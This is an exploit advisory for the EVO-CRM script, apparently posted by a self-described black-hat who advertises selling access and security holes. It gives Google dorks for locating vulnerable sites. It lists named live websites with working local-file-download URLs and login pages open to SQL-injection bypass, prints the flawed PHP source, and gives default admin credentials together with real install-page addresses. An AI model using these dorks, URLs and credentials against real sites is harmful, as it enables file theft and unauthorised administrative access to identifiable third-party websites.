/*********************************************************************************** ** Exploit Title: EVO-CRM Script Multi Vulnerability ** ** Exploit Author: Milad Hacking ** ** Vendor Homepage : http://www.operagrafica.it/ ** ** Version: 1.02 ** ** Google Dork 1 : intext:"Sito web realizzato da OperaGrafica" ** ** Google Dork 2 : inurl:"contatti.htm" intext:"Dopo aver preso visione" ** ** Date: 2020-03-13 ** ** Tested on: Windows/ Mozilla Firefox ** *********************************************************************************** ** Demo Vulnerability LFD : https://www.tvmoving.it//download.php?nome_file=download.php http://www.lacollinadelgirasole.it/download.php?nome_file=download.php http://cafinv.eu/download.php?nome_file=download.php https://www.frasipercaso.it/download.php?nome_file=download.php https://www.logistics4you.express/download.php?nome_file=download.php https://www.scattolini.it/download.php?nome_file=download.php http://aestetika.it/download.php?nome_file=download.php http://www.lacollinadelgirasole.it/download.php?nome_file=download.php *********************************************************************************** *********************************************************************************** ** Vulnerability Code Local File Download : <?php $nome_file = $_GET['nome_file']; $dimensione_file = filesize($nome_file); header("Content-type: Application/octet-stream"); header("Content-Disposition: attachment; filename=".basename($nome_file)); header("Content-Description: Download PHP"); header("Content-Length: $dimensione_file"); readfile($nome_file); ?> *********************************************************************************** ** Demo Vulnerability Bypass Login Page With Method Post To Sql Injection : https://www.tvmoving.it//riservato/index.php http://www.lacollinadelgirasole.it/riservato/index.php http://cafinv.eu/riservato/index.php https://www.frasipercaso.it/riservato/index.php https://www.logistics4you.express/riservato/index.php https://www.scattolini.it/riservato/index.php http://aestetika.it/riservato/index.php http://www.lacollinadelgirasole.it/riservato/index.php *********************************************************************************** *********************************************************************************** ** Vulnerability Code Sql Injection : <?php define('ACCESS', 'public'); define('RELATIVE_PATH', "../"); require_once(RELATIVE_PATH.'include/application_top.php'); ?> <!DOCTYPE html> <html lang="en"> <head> <?php include_once("header_top.php");?> </head> <body> <div id="caricamento" style="height:100%; top:0px;"></div> <div class="container-fluid"> <div class="row-fluid"> <div class="row-fluid"> <div class="span12 center"> <img src="img/operagrafica.jpg" alt="<?=constant(strtoupper("GENERALI_"._NOME_SITO))?>" /> <h2>Accesso riservato <?=constant(strtoupper("GENERALI_"._NOME_SITO))?></h2> </div><!--/span--> </div><!--/row--> <div class="row-fluid"> <div class="well span5 center login-box"> <div class="alert alert-info"> Inserite un utente con credenziali valide per accedere al pannello di amministrazione. </div> <form class="form-horizontal" action="<?=_ABSOLUTE_PATH?><?=_MODULI?>utente/login.php" method="post"> <fieldset> <div class="input-prepend" title="Inserisci la tua login" data-rel="tooltip_input"> <span class="add-on"><i class="icon-user"></i></span><input autofocus class="input-medium" name="login" id="username" type="text" value="" /> </div> <div class="clearfix"></div> <div class="input-prepend" title="Inserisci la tua password" data-rel="tooltip_input"> <span class="add-on"><i class="icon-lock"></i></span><input class="input-medium" name="password" id="password" type="password" value="" /> </div> <div class="clearfix"></div> <!-- <div class="input-prepend"> <label class="remember" for="remember"><input type="checkbox" id="remember" />Remember me</label> </div> <div class="clearfix"></div> --> <input name="loginsubmit" type="hidden" value="Invia" /> <p class="center span5"> <button type="submit" class="btn btn-primary">Login</button> </p> </fieldset> </form> </div><!--/span--> </div><!--/row--> <div class="row-fluid"> <div class="well span5 center"> <p>Password dimenticata? </p> <a style="margin-left:-10px;" href="richiedi_password.php" class="btn"><i class="icon-download"></i> Richiedi nuova password</a> </div><!--/span--> </div><!--/row--> </div><!--/fluid-row--> <div class="row-fluid"> <div class="span5 center"> <?=constant(strtoupper("GENERALI_"._NOME_SITO))?> </div><!--/span--> </div><!--/row--> </div><!--/.fluid-container--> <?php include_once("footer_js.php");?> </body> </html> *********************************************************************************** ** Demo Vulnerability Default Password : http://www.lemstrumenti.it/include/install/index.php https://www.e-volving.it/include/install/index.php http://www.autmarconi.it/include/install/index.php Information : Username: admin Password: nimda *********************************************************************************** ** Special thanks to: Iliya Norton , Vahid Elmi , Mahsa Black , Mahdi c0c01n, Nazila Black-hat , Mahsa Black , MSAmiee , Ahawz Hackerz , AliHack051 , Ahor4 *********************************************************************************** Sell Access And Security Holes https://fullsec.org https://telegram.me/Milad_Hacking Https://telegram.me/TheHackings http://instagram.com/Milad.Hacking milad.hacking.blackhat@Gmail.com ***********************************************************************************